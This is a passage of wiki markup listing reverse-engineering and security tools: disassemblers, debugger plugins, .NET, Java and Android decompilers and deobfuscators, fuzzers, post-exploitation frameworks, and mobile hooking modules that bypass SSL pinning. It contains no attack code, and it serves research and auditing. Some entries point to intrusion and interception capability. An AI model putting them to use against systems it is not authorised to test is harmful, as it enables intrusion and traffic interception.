*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production. &lt;br /&gt;
&lt;br /&gt;
*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local &amp;amp; mapped drives or the Windows registry.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. &amp;quot;If you implement boundaries and nobody is around to push them, do they even exist?&amp;quot;. Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Dynamic &amp;amp; Static Analysis (mostly '''unmanged''' binaries)====&lt;br /&gt;
&lt;br /&gt;
=====Interactive Disassemblers ('''static analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.&lt;br /&gt;
&lt;br /&gt;
::Binary Ninja Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.&lt;br /&gt;
&lt;br /&gt;
*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].&lt;br /&gt;
&lt;br /&gt;
::Ghidra Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm &amp;amp; MIPS scripts] - ARM &amp;amp; MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.&lt;br /&gt;
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.&lt;br /&gt;
:::*Qt Framework&lt;br /&gt;
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled &amp;amp; compiled with MSVC.&lt;br /&gt;
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.&lt;br /&gt;
&lt;br /&gt;
::IDA Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).&lt;br /&gt;
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.&lt;br /&gt;
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.&lt;br /&gt;
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.&lt;br /&gt;
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.&lt;br /&gt;
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.&lt;br /&gt;
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.&lt;br /&gt;
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.&lt;br /&gt;
::::*Oreans CV scripts&lt;br /&gt;
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
::IDA LLM Plugins&lt;br /&gt;
:::*Local (quantized LLMs Q4/INT4)&lt;br /&gt;
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.&lt;br /&gt;
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.&lt;br /&gt;
:::*Cloud&lt;br /&gt;
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.&lt;br /&gt;
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.&lt;br /&gt;
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.&lt;br /&gt;
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.&lt;br /&gt;
&lt;br /&gt;
*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)&lt;br /&gt;
&lt;br /&gt;
*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.&lt;br /&gt;
&lt;br /&gt;
=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework.  Includes Disassembler, Debugger, Emulation and Symbolik analysis engines.  Includes built-in Server and Shared-Workspace functionality.  Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism).  Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA.  Criticisms (from a core dev): &amp;quot;Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better.  PR's and suggestions welcome.&amp;quot;  Best installed via Pip:  &amp;lt;code&amp;gt;python3 -m pip install vivisect&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)&lt;br /&gt;
&lt;br /&gt;
*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).&lt;br /&gt;
&lt;br /&gt;
*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.&lt;br /&gt;
&lt;br /&gt;
::OllyDbg Scripts/Plugins/Mods&lt;br /&gt;
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.&lt;br /&gt;
&lt;br /&gt;
*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.&lt;br /&gt;
&lt;br /&gt;
::x64dbg Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.&lt;br /&gt;
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for &amp;quot;all&amp;quot; versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.&lt;br /&gt;
&lt;br /&gt;
*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.&lt;br /&gt;
&lt;br /&gt;
::GDB Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.&lt;br /&gt;
&lt;br /&gt;
====Debugging and Profiling dynamic analysis (Linux)====&lt;br /&gt;
&lt;br /&gt;
*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.&lt;br /&gt;
&lt;br /&gt;
*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====.NET (CLR)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo &amp;amp; '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)]  - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.&lt;br /&gt;
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&amp;amp;more) - cross-platform!&lt;br /&gt;
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.&lt;br /&gt;
&lt;br /&gt;
======.NET deobfuscators======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.&lt;br /&gt;
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.&lt;br /&gt;
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.&lt;br /&gt;
&lt;br /&gt;
======.NET memory dumpers======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).&lt;br /&gt;
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).&lt;br /&gt;
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.&lt;br /&gt;
&lt;br /&gt;
======.NET tracers======&lt;br /&gt;
&lt;br /&gt;
::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com&lt;br /&gt;
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.&lt;br /&gt;
&lt;br /&gt;
=====JAVA (JVM) Decompilers=====&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.&lt;br /&gt;
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly &amp;amp; Ethereum Decompilers.&lt;br /&gt;
&lt;br /&gt;
======JAVA (ART/APK)======&lt;br /&gt;
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.&lt;br /&gt;
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.&lt;br /&gt;
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.&lt;br /&gt;
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.&lt;br /&gt;
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar &amp;amp; Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger &amp;amp; More)&lt;br /&gt;
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR &amp;amp; Dex decompiler for android.&lt;br /&gt;
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.&lt;br /&gt;
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.&lt;br /&gt;
&lt;br /&gt;
======RASP (Runtime Application Self-Protection) Android======&lt;br /&gt;
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing.&amp;lt;br&amp;gt;&lt;br /&gt;
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted.&amp;lt;br&amp;gt;&lt;br /&gt;
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.&lt;br /&gt;
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.&lt;br /&gt;
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.&lt;br /&gt;
&lt;br /&gt;
======JAVA deobfuscators (mixed platforms)======&lt;br /&gt;
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.&lt;br /&gt;
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]&lt;br /&gt;
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.&lt;br /&gt;
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...&lt;br /&gt;
&lt;br /&gt;
======JAVA decompilers (platform independent)======&lt;br /&gt;
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers for '''unmanaged''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====AutoIt=====&lt;br /&gt;
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.&lt;br /&gt;
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.&lt;br /&gt;
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of &amp;quot;compiled&amp;quot; AutoIt scripts from PE executables.&lt;br /&gt;
&lt;br /&gt;
=====VB6=====&lt;br /&gt;
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables. &lt;br /&gt;
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.&lt;br /&gt;
&lt;br /&gt;
====Bytecode Decompilers====&lt;br /&gt;
&lt;br /&gt;
=====React Native Hermes=====&lt;br /&gt;
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.&lt;br /&gt;
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.&lt;br /&gt;
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).&lt;br /&gt;
&lt;br /&gt;
=====Python=====&lt;br /&gt;
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.&lt;br /&gt;
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.&lt;br /&gt;
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.&lt;br /&gt;
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.&lt;br /&gt;
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.&lt;br /&gt;
&lt;br /&gt;
=====Lua=====&lt;br /&gt;
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Fuzzers====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).&lt;br /&gt;
&lt;br /&gt;
*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel &amp;amp; redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.&lt;br /&gt;
&lt;br /&gt;
====PC platform exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.&lt;br /&gt;
&lt;br /&gt;
*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.&lt;br /&gt;
&lt;br /&gt;
====Mobile exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.&lt;br /&gt;
&lt;br /&gt;
::LSPosed Module Repository&lt;br /&gt;
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].&lt;br /&gt;
&lt;br /&gt;
::Xposed modules&lt;br /&gt;
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.&lt;br /&gt;
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.&lt;br /&gt;
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..&lt;br /&gt;
&lt;br /&gt;
::Xposed Framework API Development Documentation&lt;br /&gt;
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.&lt;br /&gt;
&lt;br /&gt;
====Network Inspection====&lt;br /&gt;
&lt;br /&gt;
=====Promiscuous mode eavesdropping TCP/UDP=====&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.&lt;br /&gt;
&lt;br /&gt;
